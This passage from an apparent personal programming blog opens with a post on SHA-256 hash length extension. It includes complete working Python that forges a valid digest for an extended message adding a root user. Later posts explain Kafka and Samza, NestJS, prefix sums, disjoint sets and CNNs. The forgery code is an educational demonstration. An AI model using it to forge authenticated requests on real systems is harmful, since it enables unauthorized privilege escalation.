Since the hash function interprets only the final padding and length as such, the original padding and length of the message that ends with bob become garbage characters in the middle of the extended message. Therefore, we need to construct the new padding and length manually in order to feed them into the compression function F.

Calculation of Length

The new length can be calculated using the previous length. We need to obtain the length of the previous message from metadata in order to calculate the new length accurately.

SHA-256

The message to be fed into the extension F (rightmost) is:

name: alice, bob<0x80><0x00>..<0x00>, charlie<0x80><0x00>...<0x00>

Here, alice, bob<0x80><0x00>..<0x00>, and charlie will be counted as three users to be added as root users to the system.
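
The whole attack can be sketched end to end in pure Python. This is an illustration under stated assumptions, not the code from the original post: the message name: alice, bob and the extension , charlie come from the example above, the helper names (first_primes, icbrt, compress, padding, sha256) are made up here, and the constants are derived from the first primes instead of being typed in by hand. hashlib is used only to produce the sender's digest and to check the result.

```python
import hashlib
import math
import struct

MASK = 0xFFFFFFFF


def first_primes(n):
    primes, candidate = [], 2
    while len(primes) < n:
        if all(candidate % p for p in primes):
            primes.append(candidate)
        candidate += 1
    return primes


def icbrt(n):
    """Floor of the cube root of n, found by binary search."""
    lo, hi = 0, 1 << (n.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo


# SHA-256 constants: fractional parts of cube/square roots of the first primes.
K = [icbrt(p << 96) & MASK for p in first_primes(64)]
H_INIT = [math.isqrt(p << 64) & MASK for p in first_primes(8)]


def rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def compress(state, block):
    """Compression function F: mix one 64-byte block into the 8 h values."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 64):
        s0 = rotr(w[i - 15], 7) ^ rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = rotr(w[i - 2], 17) ^ rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (rotr(e, 6) ^ rotr(e, 11) ^ rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[i] + w[i]) & MASK
        t2 = ((rotr(a, 2) ^ rotr(a, 13) ^ rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        a, b, c, d, e, f, g, h = (t1 + t2) & MASK, a, b, c, (d + t1) & MASK, e, f, g
    return [(x + y) & MASK for x, y in zip(state, (a, b, c, d, e, f, g, h))]


def padding(total_len):
    """Padding for a message of total_len bytes: 0x80, zeros, 64-bit length."""
    zeros = (55 - total_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)


def sha256(data, state=H_INIT, prior_len=0):
    """Hash data, optionally resuming from a state that covers prior_len bytes."""
    state = list(state)
    data += padding(prior_len + len(data))
    for i in range(0, len(data), 64):
        state = compress(state, data[i:i + 64])
    return struct.pack(">8I", *state).hex()


# What the sender computed (the attacker sees only the digest and the length).
original = b"name: alice, bob"
digest = hashlib.sha256(original).hexdigest()

# The attacker resumes from the digest and appends the extension.
extension = b", charlie"
glue = padding(len(original))
resumed = struct.unpack(">8I", bytes.fromhex(digest))
forged_digest = sha256(extension, resumed, len(original) + len(glue))
forged_message = original + glue + extension

print(forged_digest == hashlib.sha256(forged_message).hexdigest())  # True
```

Note that the attacker's part uses only digest and len(original); the content of original is needed only to assemble forged_message for the final check.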

In conclusion, a hash extension attack is a type of attack where an attacker is able to calculate the hash value of a longer message based on the hash value of a shorter message and some additional information. By exploiting the structure of certain hash functions, an attacker can append data to the original message and generate a valid hash value for the extended message without knowing the original message content. This type of attack highlights the importance of using secure hash functions that are resilient against such attacks.

An Introduction to Kafka and Samza for Stream Data Processing

Ex10si0n Yan — Sun, 14 Apr 2024 19:52:00 GMT

In which cases should we use Kafka and Samza?
By leveraging the scalability of a stream processing cluster, Kafka and Samza excel at handling high-volume and low-latency data streams. They are well-suited for processing real-time data collected by IoT devices or as a part of an OLAP system.

Kafka is a distributed event streaming platform that is used for building real-time data pipelines and streaming applications. It is commonly used for collecting, storing, and processing large amounts of data in real-time.

Kafka as a Messaging System

Kafka is a messaging system that allows different parts of a distributed system to communicate with each other. It follows a publish-subscribe pattern, where data producers publish messages without knowing how they will be used by the subscribers. This allows for decoupling between producers and consumers.

Consumers can express interest in specific types of data and receive only those messages. Kafka uses a commit log, which is an ordered and immutable data structure, to store and persist the data. However, as a user of Kafka, you don't need to worry about these technical details.

Broadly speaking, the main advantage of Kafka is that it provides a central data backbone for the organization. This means that all systems within the organization can independently and reliably consume data from Kafka. It helps in creating a unified and scalable data infrastructure.

Samza, on the other hand, is a stream processing framework that is commonly deployed with Kafka as its messaging layer. It processes data streams in real time and is designed for high-volume, low-latency workloads. Developers write custom processing logic with Samza's own APIs: the high-level Streams API or the low-level Task API.

Kafka the Publisher

Kafka introduces several abstractions. Topics categorize messages: producers publish to topics, and consumers subscribe to and read from them. Topics are divided into Partitions, which are the unit of parallelism and can be used for per-key processing. Brokers handle message persistence and replication. Kafka uses Replication for fault tolerance, electing one leader and a set of followers for each partition. If the leader fails, a live follower becomes the new leader, which is how Kafka tolerates broker failures.
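To make per-key processing concrete, here is a minimal sketch of how a key can be mapped to a partition. The function name choose_partition and the CRC32 hash are assumptions chosen for illustration; Kafka's own partitioner uses a different hash function, but the idea (same key, same partition) is the same.

```python
import zlib


def choose_partition(key: str, num_partitions: int) -> int:
    """Map a message key to a partition index (illustrative stand-in, not Kafka's partitioner)."""
    # CRC32 is deterministic across runs, unlike Python's built-in hash() for strings.
    return zlib.crc32(key.encode("utf-8")) % num_partitions


# Every message with the same key lands in the same partition,
# so one consumer sees all events for that key in order.
first = choose_partition("user-42", 4)
second = choose_partition("user-42", 4)
print(first == second)  # True
```

Because the mapping depends on the number of partitions, changing the partition count of a topic would move keys to different partitions in this sketch.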

The Publish-Subscribe Pattern

Pub/Sub provides a framework for exchanging messages between publishers (such as a news feed) and subscribers (such as a news reader)^[1]. Note that publishers don’t send messages to specific subscribers in a direct end-to-end manner. Instead, an intermediary is used - a Pub/Sub message broker, which groups messages into entities called channels (or topics). ^[2]

What is Pub/Sub? The Publish/Subscribe model explained https://ably.com/topic/pub-sub. ↩︎
Image is from Ably ↩︎
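The pattern described above can be sketched with a tiny in-memory broker. ToyBroker and its methods are hypothetical names for illustration only; this is not Kafka's API, and it leaves out persistence, partitions, and replication.

```python
from collections import defaultdict
from typing import Callable, DefaultDict, List


class ToyBroker:
    """In-memory stand-in for a Pub/Sub message broker (hypothetical, not Kafka)."""

    def __init__(self) -> None:
        # topic name -> list of subscriber callbacks
        self._subscribers: DefaultDict[str, List[Callable[[str], None]]] = defaultdict(list)

    def subscribe(self, topic: str, handler: Callable[[str], None]) -> None:
        self._subscribers[topic].append(handler)

    def publish(self, topic: str, message: str) -> int:
        """Deliver the message to every subscriber of the topic; return how many received it."""
        handlers = self._subscribers.get(topic, [])
        for handler in handlers:
            handler(message)
        return len(handlers)


broker = ToyBroker()
news_inbox: List[str] = []
sports_inbox: List[str] = []
broker.subscribe("news", news_inbox.append)
broker.subscribe("sports", sports_inbox.append)

# The publisher only names a topic; it never references a subscriber directly.
delivered = broker.publish("news", "Kafka 101 published")
print(delivered, news_inbox, sports_inbox)
```

The publisher and the subscribers only share the topic name, which is the decoupling the pattern is meant to provide.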

Sample Kafka Producer (Publisher) Code

The code defines a DataProducer class responsible for sending data to a Kafka topic. It reads a trace file line by line, parses each line into a JSON object, and determines the topic based on the "type" field. The data is then sent to the appropriate topic using Kafka's producer.send() method.
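The routing logic described above can be sketched without a Kafka client. This is not the original DataProducer class; route_trace_lines, the send callback, the type values, and the topic names are all assumptions made for illustration. With a real client, send would wrap the producer's send method.

```python
import json
from typing import Callable, Dict, Iterable, List, Tuple


def route_trace_lines(
    lines: Iterable[str],
    send: Callable[[str, str], None],
    topic_by_type: Dict[str, str],
) -> None:
    """Parse each trace line as JSON and send it to the topic chosen by its "type" field."""
    for line in lines:
        line = line.strip()
        if not line:
            continue  # skip blank lines in the trace file
        record = json.loads(line)
        topic = topic_by_type.get(record.get("type"))
        if topic is None:
            continue  # unknown type: drop it in this sketch
        send(topic, line)


# Hypothetical type values and topic names, for illustration only.
TOPIC_BY_TYPE = {"LOCATION": "locations", "REQUEST": "requests"}
trace = ['{"type": "LOCATION", "id": 1}', "", '{"type": "REQUEST", "id": 2}', '{"type": "OTHER"}']

sent: List[Tuple[str, str]] = []
route_trace_lines(trace, lambda topic, value: sent.append((topic, value)), TOPIC_BY_TYPE)
print(sent)
```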

Samza the Subscriber

Samza is a distributed stream processing framework developed by LinkedIn, which is designed to continuously compute data as it becomes available and provides sub-second response times.

Like Kafka, Samza has its own terminology. A Stream is made up of partitioned sequences of messages, similar to a Kafka topic. Jobs in Samza are written using the API and can process data from one or more streams. Samza supports stateful stream processing, where state is kept in a key-value (KV) store local to the machine running the task. This state is replicated to a changelog stream (for example, a Kafka topic) for fault tolerance.

Samza APIs

Samza provides both a high-level Streams API and a low-level Task API for processing message streams.

High Level Streams API

The Streams API allows for operations like filtering, projection, repartitioning, joins, and windows on streams in a DAG (directed acyclic graph) format.

The code defines a class called "WikipediaFeedStreamTask" that implements the "StreamTask" interface. It processes incoming messages by converting them into a map and sends them to a Kafka output stream named "wikipedia-raw".

Low Level Task API

The Task API allows more specific processing of each message. Sample code is available in the samza-hello-samza ^[1] project on GitHub.

The sample code is in the GitHub repository at: https://github.com/apache/samza-hello-samza/blob/master/src/main/java/samza/examples/wikipedia/task/ ↩︎

The code is a Java class named WikipediaParserStreamTask that implements the StreamTask interface. It contains a process method that takes in an incoming message, parses it using a WikipediaParser, and sends the parsed result to an output stream. The main method generates some example strings and passes them to the WikipediaParser.parseLine method to demonstrate its functionality.

Explore the working of Samza

Apache Samza is often used alongside Apache YARN, which manages compute resources in clusters. Samza jobs are submitted to YARN, which allocates containers and runs Samza tasks. YARN handles resource allocation, scaling, and fault tolerance. Each task reads data from a partition in the 'dirty' topic, processes it, and produces the results to the 'clean' topic. Samza ensures fault tolerance by restarting failed tasks. This architecture allows for scalable, parallel processing with high availability for real-time data pipelines.

Explain Apache YARN to Beginners

Imagine you have a large cluster of computers working together to process big data. YARN is like the manager of this cluster. Its main job is to allocate the work and resources to each computer in the cluster.

Let's say you have multiple tasks to perform, like analyzing data, running calculations, or processing real-time streams. YARN takes these tasks and divides them into smaller units called containers. These containers represent pieces of work that can be executed on individual computers in the cluster.

YARN keeps track of all the available resources in the cluster, like memory and processing power. When a task needs to be performed, YARN checks the available resources and assigns a container to do the job. It makes sure that each container gets the required resources to complete the task efficiently.

YARN also monitors the health of the containers. If a container fails or stops working, YARN automatically restarts it on another computer, ensuring that the task continues without interruption. This helps in maintaining high availability and fault tolerance.

One important thing about YARN is its flexibility. It can work with different data processing applications or frameworks, like Apache Hadoop, Apache Spark, or Apache Samza. This means you can use YARN to run different kinds of big data jobs on the same cluster, making the most efficient use of your resources.

In summary, YARN is the cluster manager that allocates work to different computers, monitors their performance, automatically handles failures, and allows you to run various data processing tasks on a large scale. It makes big data processing more efficient, scalable, and reliable.

An Introduction of NestJS, a Node.js web/app server framework.

Ex10si0n Yan — Wed, 22 Nov 2023 03:59:00 GMT

Note that this post can be used as a complement to the official Nest.js tutorial. I believe official documentation is the best way to learn a technology, so I recommend working through the step-by-step hands-on tutorial at the following link first.

Documentation | NestJS - A progressive Node.js framework

Nest is a framework for building efficient, scalable Node.js server-side applications. It uses progressive JavaScript, is built with TypeScript and combines elements of OOP (Object Oriented Programming), FP (Functional Programming), and FRP (Functional Reactive Programming).


This post aims to explain basic concepts in back-end programming. Although NestJS is a Node.js (JavaScript) tech stack, after reading this post you should understand many general concepts of back-end/API design that are not specific to Node.js.

Overall View

Before We Start: Boilerplate Code

Create a NestJS project using the Nest CLI tool, choose any package manager you like (I prefer yarn):

nest new hello-nest

To run the project from IntelliJ IDEA/WebStorm, apply the following configuration after opening the created project. In the JetBrains IDE:

Click on the dropdown menu next to the Run/Debug configurations in the top-right corner of the IDE.
Select "Edit Configurations" or "Add Configuration" option. This will open the Run/Debug Configurations dialog.
Click the "+" button in the top-left corner of the dialog to add a new configuration.
Choose "Node.js" from the list of configurations.
In the "Name" field, provide a meaningful name for your configuration (e.g., "Nest.js").
In the "JavaScript file" field, enter the path to the Nest CLI file, typically node_modules/.bin/nest, or use the full path to the nest executable.
In the "Application parameters" field, enter the Nest.js CLI command you want to use, such as start for running your application.
Set the "Working directory" to the root folder of your Nest.js project (the IDE usually fills this in automatically).

FYI, you can follow the detailed Node.js configuration tutorial provided by JetBrains in the following link.

Running and debugging Node.js | IntelliJ IDEA


Well done, you have configured the Run/Debug button. You can now simply click the Run button to start the server.

A NestJS project created by the CLI listens on port 3000 by default. After you start the server, navigate to http://localhost:3000 in your web browser; seeing the "Hello World!" message means NestJS is running successfully.

Controllers

Controllers are the code that receives requests and sends responses. A controller works like a bank teller. Here is a piece of controller code:

Note that you should not put business logic in the controller layer (although nothing stops you), since the service layer is designed for code reuse.

Controllers should handle HTTP requests and delegate more complex tasks to services, which are plain TypeScript classes declared as providers in a module (a building block that helps organize and structure the code of your application), as in the following code.

Services

NestJS utilizes the concept of "providers" for creating and managing services. In NestJS, a provider is a class annotated with the @Injectable() decorator.

You may want to alter the generated code inside app.service.ts to play with the implementation of business logic.

By visiting localhost:3000, you get Hello World! And the current time is 12:06:50 PM.

You should implement all business logic inside Services. In the service code, the getCurrentTime() method gets the current local time. It is declared private, which means the method can only be called from inside the class defined in app.service.ts.

Method scoping (annotated with private, public, ...) is important because it provides encapsulation and security. It also makes the code more maintainable.

Here is why it makes the code maintainable. Imagine that you are at a bank. You have a business account and an individual account. You go to the business counter, /business/deposit, and you sign a form (the request JSON).

The teller knows that you want to deposit 1000 USD to account 99887766, and you also provide a legal signature (authentication), which shows that you are actually you (although a signature can in principle be forged).

The service code inside business.service.ts may look like:

The private scope states that transaction() can only be used in business.service.ts, which means it handles only business services. When we implement individual.service.ts, it can have its own private transaction() method for individual services. This keeps the code maintainable (otherwise we might end up writing transaction_business() and transaction_individual()).

Routing Mechanism and RESTful convention

Controllers need a routing mechanism (there are different bank services: individual, business, ...). Routing is implemented by concatenating URL segments. A URL design following the RESTful convention looks like:

/account/create
/account/{id}/delete
/account/{id}/update
/account/{id}
/item/{id}
/items
/item/page/10

Here {id} is the id of an individual user, such as 1145141919810. The first four URLs in the list above create a user, delete a user by id (for example /account/1145141919810/delete), update a user by id, and read a user's information (such as email) by id. Generally speaking, a server's job commonly comes down to Create, Read, Update and Delete (CRUD).

/item/{id} demonstrates routing. The Controller listening on URLs that start with item handles item-related operations. Imagine an online shopping website: this URL returns the information of a specific item by its item id.

/items, as you might guess, retrieves all items (products) as one huge list.

Similarly, following the RESTful convention, /item/page/10 retrieves a specific page (the 10th page) of a collection of items. It supports pagination of a product list in an online shopping website, since displaying all products on one page is slow.

Note: in a modern web application with front-end/back-end separation, these URLs return JSON rather than a rendered web page. This design is very similar to the pattern used in mobile and embedded applications.

Prefix Sum with HashMap: Time Complexity Optimization

Ex10si0n Yan — Sat, 18 Nov 2023 03:18:00 GMT

LeetCode 560

Subarray Sum Equals K - LeetCode

Subarray Sum Equals K - Given an array of integers nums and an integer k, return the total number of subarrays whose sum equals k. A subarray is a contiguous non-empty sequence of elements within an array. Example 1: Input: nums = [1,1,1], k = 2 Output: 2. Example 2: Input: nums = [1,2,3], k = 3 Output: 2. Constraints: 1 <= nums.length <= 2 * 10^4, -1000 <= nums[i] <= 1000, -10^7 <= k <= 10^7.


Reviewing question 560: an array nums and a target k are given, and we must determine the number res of sub-arrays whose interval sum equals k. For example, given nums = [1, 1, 1, 1, 1, 1] and k = 4, the result res is 3: the target sub-arrays are nums[0..3], nums[1..4] and nums[2..5] (indices inclusive).

Adopting Prefix Sum

Computing the sum of one specific interval directly takes $O(n)$ time.

If we need interval sums more than once, as in problem 560, we should use a Prefix Sum: it takes $O(n)$ to construct the pref array and $O(1)$ to query any interval [L, R].
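A minimal sketch of the prefix sum idea follows. The function names build_prefix and interval_sum are chosen here for illustration; pref starts with a leading 0 so that intervals beginning at the first element need no special case.

```python
from typing import List


def build_prefix(nums: List[int]) -> List[int]:
    """pref[i] holds the sum of the first i elements, so pref[0] == 0. Runs in O(n)."""
    pref = [0]
    for x in nums:
        pref.append(pref[-1] + x)
    return pref


def interval_sum(pref: List[int], left: int, right: int) -> int:
    """Sum of nums[left..right], both ends inclusive, in O(1)."""
    return pref[right + 1] - pref[left]


nums = [1, 2, 3, 4]
pref = build_prefix(nums)
print(pref)                      # [0, 1, 3, 6, 10]
print(interval_sum(pref, 1, 2))  # 5, which is 2 + 3
```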

Back to the Problem

In this problem we need to check the interval sum for each pair of L and R. Because nums contains negative elements, the sums are not monotonic, so a sliding window does not work.

The brute-force code is easily written with two for loops, which incurs a quadratic time complexity of $O(n^2)$.
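The brute-force approach can be sketched as below. The function name subarray_sum_brute is an assumption; pref[R] - pref[L] is the sum of the elements between positions L and R - 1.

```python
from typing import List


def subarray_sum_brute(nums: List[int], k: int) -> int:
    """Count subarrays with sum k by checking every (L, R) pair: O(n^2)."""
    pref = [0]
    for x in nums:
        pref.append(pref[-1] + x)

    res = 0
    for R in range(1, len(pref)):
        for L in range(R):
            # pref[R] - pref[L] is the sum of nums[L..R-1]
            if pref[R] - pref[L] == k:
                res += 1
    return res


print(subarray_sum_brute([1, 1, 1], 2))           # 2
print(subarray_sum_brute([1, 1, 1, 1, 1, 1], 4))  # 3
```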

From observation, we notice that:

When we consider each R and want the interval sum starting at each L ranging from 0 to R, linear time is needed to subtract each pref[L] from pref[R].

Scanning every pref[L] linearly wastes time, so we can trade some space for time by adopting a dictionary (HashMap).

Consider that:

In the inner for loop over L, we want to know how many L's satisfy pref[R] - pref[L] == k, which is equivalent to pref[L] == pref[R] - k.
We adopt a dictionary d that counts L's keyed by their Prefix Sum, so d[i] is the number of L's satisfying pref[L] == i.
Then we replace the inner loop with res += d[pref[R] - k]. That's wise, isn't it?
Finally we update the dictionary d inside the loop over R, after the lookup, so that only earlier positions are counted.
Note that we should initialize d with d = {0: 1}. Think about why. (It is similar to initializing pref with pref = [0]: an interval may start from the first element.)

We have eliminated the scan over pref[L]. We can also discard pref[R]: since R is in the outer loop, that loop can be merged with the earlier loop that computes pref. Discarding the pref array this way makes the prefix sum calculate-on-use.
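Putting the steps above together gives a sketch like the following. The names subarray_sum and running are chosen here for illustration; running plays the role of pref[R], computed on use.

```python
from typing import Dict, List


def subarray_sum(nums: List[int], k: int) -> int:
    """Count subarrays with sum k in O(n) using a prefix-sum counter."""
    d: Dict[int, int] = {0: 1}  # the empty prefix has sum 0
    running = 0                 # stands in for pref[R]
    res = 0
    for x in nums:
        running += x
        # number of earlier prefixes with pref[L] == pref[R] - k
        res += d.get(running - k, 0)
        # record the current prefix only after the lookup
        d[running] = d.get(running, 0) + 1
    return res


print(subarray_sum([1, 1, 1], 2))           # 2
print(subarray_sum([1, 1, 1, 1, 1, 1], 4))  # 3
```

Updating d after the lookup matters when k is 0: otherwise the current prefix would match itself and count an empty interval.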

Conclusion

We use a dictionary (HashMap) to replace the inner for loop for variable L, and we modify the code to eliminate the need for the 'pref' array. As a result, the time complexity is reduced from quadratic time to linear time. This technique is quite useful and can be applied to more LeetCode problems.

Disjoint Set: City Connection Problem

Ex10si0n Yan — Wed, 18 Oct 2023 04:20:00 GMT

City Connection Problem

Let us consider a scenario of connecting cities with highways. The question is how we can determine if it is possible to travel from one city to another only by highways. To solve this problem, we can use the Union-Find Disjoint Sets, also known as disjoint sets.

Reading in Roads Info

Since we are focusing on the interconnections between cities on the map, we will denote two interconnected cities as X -- Y, where X and Y represent the city names. For example:

1 -- 3
1 -- 2
2 -- 4
3 -- 4
5 -- 6
6 -- 7

The notation -- indicates an interconnection between a pair of cities. We can build a graph according to this specification, like this:

In this graph, if we want to check whether city 4 is connected with city 7, we can use a search algorithm such as Depth-first Search (DFS) or Breadth-first Search (BFS). To be sure that we cannot reach city 7 from city 4, we must traverse the whole left component along the 1-2-4-3-1 cycle. The time complexity of this check is $O(N)$.

If all we need to know is whether two cities are interconnected, a more time-efficient way is to build disjoint sets, which lower the time complexity with the help of trees.

How Disjoint Set works

Modeling this problem with graph theory, we regard each city as a node, as shown in the figure. At first, we initialize each node's parent to be the node itself, since disjoint sets work as a forest (a set of trees) and every tree has a root node. In the current scenario every node is a root node, so there are 7 trees in this figure.
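The initial state can be sketched in a couple of lines of Python. The names NUM_CITIES and parent are assumptions; index 0 is left unused so that city numbers map directly to list indices.

```python
NUM_CITIES = 7

# parent[c] == c means city c is the root of its own tree.
parent = list(range(NUM_CITIES + 1))  # index 0 is unused

roots = [c for c in range(1, NUM_CITIES + 1) if parent[c] == c]
print(len(roots))  # 7 trees, one per city
```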

Now we read in the data describing how the cities are connected. For a link such as 1 -- 3, we need to change the parent of one node to the other (it does not matter whether we pick node 1 or node 3). The diagram illustrates the disjoint sets after this change.

Okay, that seems easy. Let us do the next link, 1 -- 2. By the rules of a tree, a node can have only one parent. If we changed the parent of node 1 to node 2, node 3 would no longer be the parent of node 1, which loses information. The solution is straightforward. Each root node has itself as its parent, and each group of interconnected nodes is identified by its root node. So if node 2 wants to join the group whose root is node 3, we simply change the parent of node 3 (the group's root node) to node 2.

Here are the rules:

1. If we are going to link two nodes which are in different groups (a single node is also considered a group), link the root nodes of the two groups together.

2. If we are going to link two nodes which are in the same group (having the same group root node), do nothing.

The Python code for finding a group's root node is:
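A minimal sketch of root finding and of the two linking rules follows. The function name parent_of matches the name used in this post; the helper link and the choice of attaching the first root under the second are assumptions made to reproduce the example.

```python
parent = list(range(8))  # cities 1..7, index 0 unused


def parent_of(node: int) -> int:
    """Walk up the tree until we reach a node that is its own parent (the root)."""
    while parent[node] != node:
        node = parent[node]
    return node


def link(x: int, y: int) -> None:
    """Rule 1: join the two roots if the groups differ. Rule 2: otherwise do nothing."""
    root_x, root_y = parent_of(x), parent_of(y)
    if root_x != root_y:
        parent[root_x] = root_y


for x, y in [(1, 3), (1, 2), (2, 4), (3, 4), (5, 6), (6, 7)]:
    link(x, y)

print(parent_of(4), parent_of(7))    # 4 7
print(parent_of(4) == parent_of(7))  # False: city 4 and city 7 are not connected
```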

By applying the rules, we finally get the following trees after linking 6 -- 7:

In the final result, after 6 -- 7, we have two groups, one with root node 4 and one with root node 7. Back to the question: to check whether node 4 and node 7 are interconnected, we check whether parent_of(4) is equal to parent_of(7).

However, the worst case for the current disjoint sets is that a tree degenerates into a linked list (a chain), as in the example given. The time complexity is then still similar to that of a search algorithm. To tackle the issue, we flatten each tree into a depth-1 tree, as illustrated in the following figure.

The following updated parent_of(node) function can implement this action
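One way to write the updated function is with recursive path compression, sketched below. The starting parent list is the chain produced by the example links (1 -> 3 -> 2 -> 4 and 5 -> 6 -> 7); treat it as an assumed snapshot of that state.

```python
# State after the six example links: 1 -> 3 -> 2 -> 4 and 5 -> 6 -> 7 (index 0 unused).
parent = [0, 3, 4, 2, 4, 6, 7, 7]


def parent_of(node: int) -> int:
    """Find the root and re-point every node on the path directly at it."""
    if parent[node] != node:
        parent[node] = parent_of(parent[node])
    return parent[node]


print(parent_of(1))  # 4
print(parent_of(5))  # 7
print(parent)        # [0, 4, 4, 4, 4, 7, 7, 7]
```

After one lookup from the bottom of each chain, every node on that chain points straight at its root, so later lookups take a single step.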

Algorithms that Disjoint Set inspires

The Kruskal algorithm for minimum spanning trees and Tarjan's offline algorithm for the lowest common ancestor (LCA) are both based on the disjoint-set data structure. A disjoint-set is a data structure used for solving the union-find problem, which involves partitioning elements into disjoint sets and supporting queries to determine if two elements are in the same set.

When we use path compression (combined with union by rank), the cost of checking whether two nodes are interconnected is no longer bounded by the height of the tree; it drops to an amortized $O(\alpha(n))$.

The amortized time complexity of each operation in a disjoint-set data structure is then only $O(\alpha(n))$, where $\alpha$ is the inverse of the Ackermann function. The growth of $\alpha(n)$ is extremely slow, meaning that the running time of a single operation can be treated as a very small constant ^[1].

The definition of the Ackermann function $A(m, n)$ is:

$$
A(m, n) =
\begin{cases}
n+1&\text{if }m=0 \\
A(m-1,1)&\text{if }m>0\text{ and }n=0 \\
A(m-1,A(m,n-1))&\text{otherwise}
\end{cases}
$$
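The definition translates directly into a recursive function. This sketch is only meant for very small arguments: the value and the recursion depth explode quickly, which is exactly why the inverse function grows so slowly.

```python
def ackermann(m: int, n: int) -> int:
    """Direct transcription of the three cases of A(m, n); only usable for tiny inputs."""
    if m == 0:
        return n + 1
    if n == 0:
        return ackermann(m - 1, 1)
    return ackermann(m - 1, ackermann(m, n - 1))


print(ackermann(1, 2))  # 4
print(ackermann(2, 3))  # 9
```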

https://oi-wiki.org/ds/dsu/ ↩︎

Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns

Ex10si0n Yan — Sat, 29 Apr 2023 00:00:00 GMT

Implementing Neural Networks from Scratch

In this post, we’ll understand how neural networks work while implementing one from scratch in Python.


In the previous post, we introduced how a Neural Network learns as a mathematical simulation of neurons. In this post, we introduce a more advanced neural network architecture, the Convolutional Neural Network (CNN), which in a sense forms a vision that can extract features automatically.

Filtering & Kernels

In the area of Digital Image Processing, it is well-known that there are many kinds of filters to fulfill a specific kind of work, such as border detection, blurring, sharpening, etc.

CNN can classify MNIST dataset

As an example of border detection on a grayscale image, the Sobel and Laplacian edge detectors detect borders (sudden changes in pixel values) with a filter, also called a kernel. For the Laplacian operator the kernel is:

$$\begin{bmatrix} -1 & -1 & -1 \\ -1 & 8 & -1 \\ -1 & -1 & -1 \end{bmatrix} $$

The filter is then applied to the image as a sliding window, as shown in the animation below:

2D Sliding Window

What happens at each filtering step (the white box in the front) follows the calculation below:

Calculation in Image Filtering
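The sliding-window calculation can be sketched in plain Python. The function name apply_filter and the tiny test image are assumptions for illustration; no padding is used, so the output is smaller than the input, and the kernel is applied as-is (filtering, without flipping).

```python
from typing import List

Matrix = List[List[int]]

LAPLACIAN: Matrix = [
    [-1, -1, -1],
    [-1,  8, -1],
    [-1, -1, -1],
]


def apply_filter(image: Matrix, kernel: Matrix) -> Matrix:
    """Slide the kernel over the image and sum the element-wise products at each position."""
    kh, kw = len(kernel), len(kernel[0])
    out_h = len(image) - kh + 1
    out_w = len(image[0]) - kw + 1
    output = []
    for r in range(out_h):
        row = []
        for c in range(out_w):
            acc = 0
            for i in range(kh):
                for j in range(kw):
                    acc += image[r + i][c + j] * kernel[i][j]
            row.append(acc)
        output.append(row)
    return output


# A dark region (0) next to a bright region (9): the border sits between columns 2 and 3.
image = [
    [0, 0, 0, 9, 9, 9],
    [0, 0, 0, 9, 9, 9],
    [0, 0, 0, 9, 9, 9],
    [0, 0, 0, 9, 9, 9],
]
edges = apply_filter(image, LAPLACIAN)
print(edges)  # [[0, -27, 27, 0], [0, -27, 27, 0]]
```

Flat regions produce 0 because the kernel entries sum to zero, while windows that straddle the border produce large positive or negative responses.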

Due to the characteristics ^[1] of kernel design, borders could be detected as shown in the image below.

https://homepages.inf.ed.ac.uk/rbf/HIPR2/log.htm ↩︎

Convolution

Image filtering and convolution are two closely related concepts in image processing; however, they differ slightly:

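Convolution flips the kernel (rotates it by 180°) before sliding it over the image, while filtering applies the kernel as it is. The flip comes from signal processing, where convolution reverses one signal along the time axis; for images, the time axis becomes the spatial axes. For a symmetric kernel such as the Laplacian kernel above, the two operations give the same result.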

For a better understanding, it is fine to regard convolution as a kind of filtering, since the key here is to shrink the size of the image while retaining its features as much as possible.

Fully Automatic on Parameter Optimizing

By recapping the gradient descent in training a Neural Network, we know that:

Learning is in fact minimizing the loss automatically
The loss is determined by data (X), label (y), weights and bias (W, b)
Data (X) and labels (y) usually cannot be changed since they are ground truth
The network parameters, weights and biases (W, b), can be changed to optimize the performance of the network
In back-propagation, each weight and bias (W, b) is updated by descending along the gradient of the loss with respect to it

Hence, the Neural Net can learn by changing its network parameters, i.e. weights and bias (W, b).

So How to Determine the Kernel?

Through gradient descent, the neural network learns by updating its parameters. A CNN architecture, however, starts with Convolutional Layers, which are then connected to Fully Connected Layers, i.e. a deep neural network. Each Convolutional Layer contains its own kernels, and each kernel is simply initialized as a random matrix. The key point is that each kernel can also be updated by gradient descent:

During the training process, each entry of the kernel is updated by calculating the partial derivative of the loss function with respect to that entry of the kernel.

Wow, the kernels can learn by themselves too. Given different training data, each kernel converges to a specific matrix that is relatively optimal for the task at hand, whether that is classification or segmentation.

Extracting Features and Poolings

Although CNNs can handle tasks other than images, we use the most classical task, image classification, to illustrate the process. A color image usually adopts the RGB format, which contains three channels: Red, Green, and Blue. The image of Lena is a classical example in image processing. Below are its RGB channels. The Red channel, for example, holds only the magnitude of red; the lighter the pixel, the higher the magnitude. The color image of Lena is the composition of the magnitudes of the three color channels.

RGB Extraction

For a CNN to handle a color image, we usually first apply a convolution layer that maps 3 channels to n channels. In the following diagram, each black box is a kernel.

To simplify, we set every kernel to 3x3, so a 26x26 image is reduced to 24x24 because no image padding is used (26 - 3 + 1 = 24).

In the first step (Conv 26x26x3 -> 24x24x6), a 26x26x3 image is turned into a 24x24x6 feature. The process is carried out by 6 (1) different (randomly initialized) 3x3x3 (2) convolution kernels.

6 kernels can generate 6 different 2D features (we usually regard the images in the middle process as features).
Note that 3x3x3 denotes (kernel width, kernel height, kernel channels). The 3x3x3 kernel is a 3D kernel that convolves all three RGB channels of the original image and sums the results into a single 2D feature.

Then comes the next step (Pool 24x24x6 -> 12x12x6). Let us use max-pooling to illustrate it. Pooling is the same as Subsampling: it retains only a representative value, such as the maximum, of each kernel-size window. The image size is divided by the kernel size after pooling, so a 2x2 pool turns 24x24 into 12x12.

Pooling, GIF from victorzhou.com
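Max-pooling on a single 2D feature can be sketched as follows. The function name max_pool and the 4x4 sample values are made up for illustration; the window moves in steps equal to its own size, so windows do not overlap.

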